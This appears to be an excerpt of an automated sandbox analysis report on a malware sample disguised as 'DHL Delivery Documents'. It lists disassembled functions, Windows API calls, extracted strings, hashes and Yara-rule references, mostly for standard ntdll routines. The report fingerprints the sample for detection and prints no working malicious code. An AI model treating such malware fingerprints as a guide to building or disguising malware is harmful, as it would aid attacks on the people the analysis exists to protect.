                        • API String ID: 2994545307-0
                        • Opcode ID: 42d000c357d900331b9c06979ac9d7375bb147b2d6d039bfa1fafba772e122c6
                        • Instruction ID: caff9a2da152ccbd3e620002e54a69bd2e80a8a2d658815fe2d3a7fe00e7d786
                        • Opcode Fuzzy Hash: 42d000c357d900331b9c06979ac9d7375bb147b2d6d039bfa1fafba772e122c6
                        • Instruction Fuzzy Hash: 689002B160560442D1007158455570A100997D0601F65C411A4424568EC795CA5166A2
                        Function 00413FDC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59threadwindowCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        • PostThreadMessageW.USER32(y11J94u5t,00000111,00000000,00000000), ref: 00414060
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.2632121823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_400000_DHL_Delivery Documents.jbxd
                        Yara matches
                        Similarity
                        • API ID: MessagePostThread
                        • String ID: y11J94u5t$y11J94u5t
                        • API String ID: 1836367815-1857237950
                        • Opcode ID: 58d8be79e16e3dc60e96aa8b4312756853e7c9e4fcf57e36218cd9b2329fe717
                        • Instruction ID: cc828ff01026f90f1c64f201f30b97ea4b1239e64b2ab6d0f48480ce2f890cc2
                        • Opcode Fuzzy Hash: 58d8be79e16e3dc60e96aa8b4312756853e7c9e4fcf57e36218cd9b2329fe717
                        • Instruction Fuzzy Hash: 21110871E4125876EB21ABD2DC02FDE7B7C8F41754F40812AFA047B280D6BC560687E9
                        Function 00413FE3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57threadwindowCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        • PostThreadMessageW.USER32(y11J94u5t,00000111,00000000,00000000), ref: 00414060
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.2632121823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_400000_DHL_Delivery Documents.jbxd
                        Yara matches
                        Similarity
                        • API ID: MessagePostThread
                        • String ID: y11J94u5t$y11J94u5t
                        • API String ID: 1836367815-1857237950
                        • Opcode ID: bd4e12aaaf9162ff1fb2c4a3bfe9cfbe65051a9948c3cdfd28bd0b9096c44847
                        • Instruction ID: 651202df5359c4b1c478fb6e16e8d4064c1d4a35b1e84aa34120ae049efa0491
                        • Opcode Fuzzy Hash: bd4e12aaaf9162ff1fb2c4a3bfe9cfbe65051a9948c3cdfd28bd0b9096c44847
                        • Instruction Fuzzy Hash: 3801C871E4125876EB21ABD29C02FDE7B7C9F40754F044156FA047B181D6BC560587A9
                        Function 0042B8A3 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 38 42b8a3-42b8e4 call 404933 call 42c5e3 RtlFreeHeap
                        APIs
                        • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4,?,?,?,?,?), ref: 0042B8DF
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.2632121823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_400000_DHL_Delivery Documents.jbxd
                        Yara matches
                        Similarity
                        • API ID: FreeHeap
                        • String ID: ^gA
                        • API String ID: 3298025750-2986628814
                        • Opcode ID: 5b5779b60b6029d5b904e4ea3c71d230503f93d838177fd9535817038665164d
                        • Instruction ID: d1b7cdcc687be7268f1dab5434fc267ee9aa6777f2573276c05546cdb62020f5
                        • Opcode Fuzzy Hash: 5b5779b60b6029d5b904e4ea3c71d230503f93d838177fd9535817038665164d
                        • Instruction Fuzzy Hash: 59E06DB1204214BBD624EE69DC41E9B33ACEFC9710F400019FA08A7241D670B911CBB8
                        Function 0042B853 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 88 42b853-42b894 call 404933 call 42c5e3 RtlAllocateHeap
                        APIs
                        • RtlAllocateHeap.NTDLL(?,0041E1D8,?,?,00000000,?,0041E1D8,?,?,?), ref: 0042B88F
                        Memory Dump Source
                        • Source File: 00000008.00000002.2632121823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_400000_DHL_Delivery Documents.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocateHeap
                        • String ID:
                        • API String ID: 1279760036-0
                        • Opcode ID: e5a46834363e99c52d6815dcfa8bb54489d8a8d2589ec9944ef7440d54d75e6c
                        • Instruction ID: 43464d4c100cc5653048c36a615d0a47c54632ee96d3129ed3818db9d3e94e43
                        • Opcode Fuzzy Hash: e5a46834363e99c52d6815dcfa8bb54489d8a8d2589ec9944ef7440d54d75e6c
                        • Instruction Fuzzy Hash: C5E06DB5204214BBC614EE59DC46EDB33ACEFC9714F004419FA08A7241C670B91186B8
                        Function 0042B8F3 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 93 42b8f3-42b92c call 404933 call 42c5e3 ExitProcess
                        APIs
                        • ExitProcess.KERNEL32(?,00000000,?,?,F978D589,?,?,F978D589), ref: 0042B927
                        Memory Dump Source
                        • Source File: 00000008.00000002.2632121823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_400000_DHL_Delivery Documents.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExitProcess
                        • String ID:
                        • API String ID: 621844428-0
                        • Opcode ID: 89564e1482107890f717570798dc677ceb090b8adaeb1f9c35f06bafd03b1667
                        • Instruction ID: b04e60342bc957c43722cce74b24b471a7b82de60c1e0470105fae74616f7203
                        • Opcode Fuzzy Hash: 89564e1482107890f717570798dc677ceb090b8adaeb1f9c35f06bafd03b1667
                        • Instruction Fuzzy Hash: 11E046722002147BC620AA6AEC41F9BB76DDFC6714F40402AFA08A7282C6B5B910C7E5
                        Function 01C52C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 98 1c52c0a-1c52c0f 99 1c52c11-1c52c18 98->99 100 1c52c1f-1c52c26 LdrInitializeThunk 98->100
                        APIs
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 11151636ada2e1b7bfbdca6ff80f0898ca153c9ac9311a7f920fd4ed7b53b3dc
                        • Instruction ID: 27c7eb74f51045640fa19fcd77c3200ccc742d65db20024dec120263e8773251
                        • Opcode Fuzzy Hash: 11151636ada2e1b7bfbdca6ff80f0898ca153c9ac9311a7f920fd4ed7b53b3dc
                        • Instruction Fuzzy Hash: CFB09BB19015C5C5EB51E764460971B794477D0701F15C061D6030641F4738D1D1E275

                        Non-executed Functions

                        Function 01C92349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                        • API String ID: 0-2160512332
                        • Opcode ID: dcc9fbec873fe03ea2171123ca45b2df5918d09e59aaa1c9eb1e9c70b81863c7
                        • Instruction ID: 1307dd35ae7d06e69f91f2d08caf2bf693f4436fa6b624d34be74c4a70a49ece
                        • Opcode Fuzzy Hash: dcc9fbec873fe03ea2171123ca45b2df5918d09e59aaa1c9eb1e9c70b81863c7
                        • Instruction Fuzzy Hash: BB92AF71608382EFEB21CF29C888B6BB7E8BB84754F04491DFA95D7250D774E944CB92
                        Function 01C48620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                        Download Yara Rule
                        Strings
                        • Critical section address., xrefs: 01C85502
                        • Invalid debug info address of this critical section, xrefs: 01C854B6
                        • Critical section debug info address, xrefs: 01C8541F, 01C8552E
                        • 8, xrefs: 01C852E3
                        • Critical section address, xrefs: 01C85425, 01C854BC, 01C85534
                        • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01C8540A, 01C85496, 01C85519
                        • undeleted critical section in freed memory, xrefs: 01C8542B
                        • double initialized or corrupted critical section, xrefs: 01C85508
                        • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01C854E2
                        • Thread identifier, xrefs: 01C8553A
                        • corrupted critical section, xrefs: 01C854C2
                        • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01C854CE
                        • Address of the debug info found in the active list., xrefs: 01C854AE, 01C854FA
                        • Thread is in a state in which it cannot own a critical section, xrefs: 01C85543
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                        • API String ID: 0-2368682639
                        • Opcode ID: 9cadef2173d3b13e28de97b0910c14d08c51c91a5f1373889d95f0ef18d1ae01
                        • Instruction ID: 15f0f1dcdd2322242aefa5c6c3d8650fc4c0471583ac92975277e8abe20d4009
                        • Opcode Fuzzy Hash: 9cadef2173d3b13e28de97b0910c14d08c51c91a5f1373889d95f0ef18d1ae01
                        • Instruction Fuzzy Hash: 69818DB1A40348EFDB25CF9AC885BAEBBB5EB08B14F10415DF604B7650D3B1E944CB60
                        Function 01C429F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                        Download Yara Rule
                        Strings
                        • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 01C822E4
                        • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01C82506
                        • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 01C824C0
                        • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 01C825EB
                        • RtlpResolveAssemblyStorageMapEntry, xrefs: 01C8261F
                        • @, xrefs: 01C8259B
                        • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01C82602
                        • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01C82409
                        • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01C82624
                        • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01C82412
                        • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01C82498
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                        • API String ID: 0-4009184096
                        • Opcode ID: 4d72082c4eea8493c8c2be7de2756e395ed6b5892931f22dcc9253bfb82e764c
                        • Instruction ID: d2976ae5ea7945bcb7e6211a82c1486e8fd241199c9f543f2bb48a97a20b6c95
                        • Opcode Fuzzy Hash: 4d72082c4eea8493c8c2be7de2756e395ed6b5892931f22dcc9253bfb82e764c
                        • Instruction Fuzzy Hash: C9028FF1D04229DBEB31DB58CC85B9AB7B8AF54304F0041EAA609A7241DB70DF84CF69
                        Function 01CB8B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                        • API String ID: 0-2515994595
                        • Opcode ID: a7a60d59c385a7a57994bb4e63bb15071aa129da7a7281ac219562dbb48c43ea
                        • Instruction ID: 840ca0990544a35c919273bb61a5558b2b84dafc971528d333470a3425afe386
                        • Opcode Fuzzy Hash: a7a60d59c385a7a57994bb4e63bb15071aa129da7a7281ac219562dbb48c43ea
                        • Instruction Fuzzy Hash: 18519DB1504306DBD729DF298888BEBBBECAF94650F144A1EA959C3240E770D644CBD2
                        Function 01CC0274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                        • API String ID: 0-1700792311
                        • Opcode ID: 60d92946d7160c81c46a62d8a2dd5883262c25bf7aff8a6d2f8b96862ee4567d
                        • Instruction ID: 3a568de00c61d2ad4178042dfb6532dc023ff522922043ff286cf3d375438310
                        • Opcode Fuzzy Hash: 60d92946d7160c81c46a62d8a2dd5883262c25bf7aff8a6d2f8b96862ee4567d
                        • Instruction Fuzzy Hash: D7D1CB39600686EFDB26DFA9C440AAAFBF1FF59A04F08805DE5459B252C734DEA0CB54
                        Function 01C989B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                        Download Yara Rule
                        Strings
                        • VerifierDlls, xrefs: 01C98CBD
                        • AVRF: -*- final list of providers -*- , xrefs: 01C98B8F
                        • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01C98A67
                        • VerifierDebug, xrefs: 01C98CA5
                        • HandleTraces, xrefs: 01C98C8F
                        • VerifierFlags, xrefs: 01C98C50
                        • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01C98A3D
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                        • API String ID: 0-3223716464
                        • Opcode ID: a36e16c81a097499d1b36da0bc3ab9502ad2d2693b25d706c6bda9d3db5e1e8f
                        • Instruction ID: f35062ca8e6e484506769f22ecd400f137e22d79e05a552fd97fe2e3f0f19dc1
                        • Opcode Fuzzy Hash: a36e16c81a097499d1b36da0bc3ab9502ad2d2693b25d706c6bda9d3db5e1e8f
                        • Instruction Fuzzy Hash: 4591347264535AEFDB22EF299888B1B77A4AF56B14F04045CFA40AB391C730ED54CB91
                        Function 01C1EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                        • API String ID: 0-1109411897
                        • Opcode ID: b746aa7c885d1fe57790a29d4dc267bbbb4f79dce8f03e2a978a31d5e45688aa
                        • Instruction ID: 9d6b1a5c746de34a02e6f2a57a4d978d9c9f3d6a7929f2fd2688f1672413646c
                        • Opcode Fuzzy Hash: b746aa7c885d1fe57790a29d4dc267bbbb4f79dce8f03e2a978a31d5e45688aa
                        • Instruction Fuzzy Hash: EBA26870A0562ACFDB69CF19CC98BA9BBB5AF46304F1442E9D80DA7254DB70DE85DF00
                        Function 01C463FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                        • API String ID: 0-792281065
                        • Opcode ID: 4880793a055b9b365a0434babbc651092f12e1daed82a0dea47701922e37c913
                        • Instruction ID: c8bb1a6e89dc5f73e72b5722ff4be2dfc3e27d01aec9672d531b446e1591a70d
                        • Opcode Fuzzy Hash: 4880793a055b9b365a0434babbc651092f12e1daed82a0dea47701922e37c913
                        • Instruction Fuzzy Hash: 52917E30B04326DBEF3AEF59D889BAA7BA1BF51B28F00015DE90167385D774D941D790
                        Function 01C0645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                        Download Yara Rule
                        Strings
                        • minkernel\ntdll\ldrinit.c, xrefs: 01C69A11, 01C69A3A
                        • apphelp.dll, xrefs: 01C06496
                        • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01C69A2A
                        • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 01C699ED
                        • LdrpInitShimEngine, xrefs: 01C699F4, 01C69A07, 01C69A30
                        • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01C69A01
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                        • API String ID: 0-204845295
                        • Opcode ID: 78f2e7707561b2a815ec5b4a4759f45f1de627c63a3e3536f87db16ef197904e
                        • Instruction ID: e432de37824f5da386a26ca671dedf71364dfba06ffb0ef60a279ddd8c779de2
                        • Opcode Fuzzy Hash: 78f2e7707561b2a815ec5b4a4759f45f1de627c63a3e3536f87db16ef197904e
                        • Instruction Fuzzy Hash: 2B51E171208300EFD726DF24C882BAB77E8FF84648F00091DF586972A1D730EA54DB92
                        Function 01C4C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                        Download Yara Rule
                        Strings
                        • minkernel\ntdll\ldrredirect.c, xrefs: 01C88181, 01C881F5
                        • LdrpInitializeImportRedirection, xrefs: 01C88177, 01C881EB
                        • minkernel\ntdll\ldrinit.c, xrefs: 01C4C6C3
                        • Unable to build import redirection Table, Status = 0x%x, xrefs: 01C881E5
                        • LdrpInitializeProcess, xrefs: 01C4C6C4
                        • Loading import redirection DLL: '%wZ', xrefs: 01C88170
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                        • API String ID: 0-475462383
                        • Opcode ID: 053e1695a3c82ee7df181d79bcb361425c787596380c4b29eec9946cd6b70168
                        • Instruction ID: a92847d53612f81394e27dbd3e9a329bc39dac49666c2ae2388a2b3e8e8b5e5b
                        • Opcode Fuzzy Hash: 053e1695a3c82ee7df181d79bcb361425c787596380c4b29eec9946cd6b70168
                        • Instruction Fuzzy Hash: B731E271648342EFC324EF29D98AE1AB7D5EFD4B14F04055CF9416B2A1EB20ED05D7A2
                        Function 01C42674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                        Download Yara Rule
                        Strings
                        • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 01C821BF
                        • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01C82178
                        • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 01C8219F
                        • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01C82180
                        • RtlGetAssemblyStorageRoot, xrefs: 01C82160, 01C8219A, 01C821BA
                        • SXS: %s() passed the empty activation context, xrefs: 01C82165
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                        • API String ID: 0-861424205
                        • Opcode ID: 5115070d50254f481645699bbf1c83584ab8e020dfe96410158c0a1027418bcd
                        • Instruction ID: f42f2ea63fa7a1a01c96ba134e3c4087df6352274649266d11ae149bf86b0951
                        • Opcode Fuzzy Hash: 5115070d50254f481645699bbf1c83584ab8e020dfe96410158c0a1027418bcd
                        • Instruction Fuzzy Hash: B431243AA40215FBEB21DA9ADC8AF5A7A78DF65A84F15009DBB04A7150D770DE40C6A0
                        Function 01C5096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 01C52DF0: LdrInitializeThunk.NTDLL ref: 01C52DFA
                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01C50BA3
                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01C50BB6
                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01C50D60
                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01C50D74
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                        • String ID:
                        • API String ID: 1404860816-0
                        • Opcode ID: b0df3237c6e1776c8e338351034718907c8541aaccc0be1956309c0bcdb534f3
                        • Instruction ID: b9eeb6e9d916fa7c93624aa191aa29b4d9dbcd7495d66dae12984c526fce16ea
                        • Opcode Fuzzy Hash: b0df3237c6e1776c8e338351034718907c8541aaccc0be1956309c0bcdb534f3
                        • Instruction Fuzzy Hash: 37425971900715DFDB61CF28C881BAAB7F4BF44314F1485AAE989EB241E770EA84CF61
                        Function 01C1A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                        • API String ID: 0-379654539
                        • Opcode ID: 0ac52ab2adca48bd324b4d7c4329706bd6726c515aa829841578d8ce855c57c1
                        • Instruction ID: 3ed5fa6edb19c483bb5e672b0ecac8fdc30f393c3ed0858939e95198f678cc96
                        • Opcode Fuzzy Hash: 0ac52ab2adca48bd324b4d7c4329706bd6726c515aa829841578d8ce855c57c1
                        • Instruction Fuzzy Hash: 75C1BC70149382CFD721CF59C044B6ABBE4FF96704F04886AF9968B259E374CA49EB52
                        Function 01C48402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                        Download Yara Rule
                        Strings
                        • @, xrefs: 01C48591
                        • minkernel\ntdll\ldrinit.c, xrefs: 01C48421
                        • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 01C4855E
                        • LdrpInitializeProcess, xrefs: 01C48422
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                        • API String ID: 0-1918872054
                        • Opcode ID: 1fdedcb8a1816aa1c5bc76a7a1183e9665e77acb6609fe52ff6ac238ed33d439
                        • Instruction ID: 63fb32ae32385c6c50a543f4acf91625ea0cc9a4f797a9a0edb48556b8537c8e
                        • Opcode Fuzzy Hash: 1fdedcb8a1816aa1c5bc76a7a1183e9665e77acb6609fe52ff6ac238ed33d439
                        • Instruction Fuzzy Hash: 1C91AD71508345EFE721EFA5CC84FABBAE8BF84744F40492EFA8492150E374DA44DB66
                        Function 01C4273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                        Download Yara Rule
                        Strings
                        • .Local, xrefs: 01C428D8
                        • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 01C822B6
                        • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 01C821D9, 01C822B1
                        • SXS: %s() passed the empty activation context, xrefs: 01C821DE
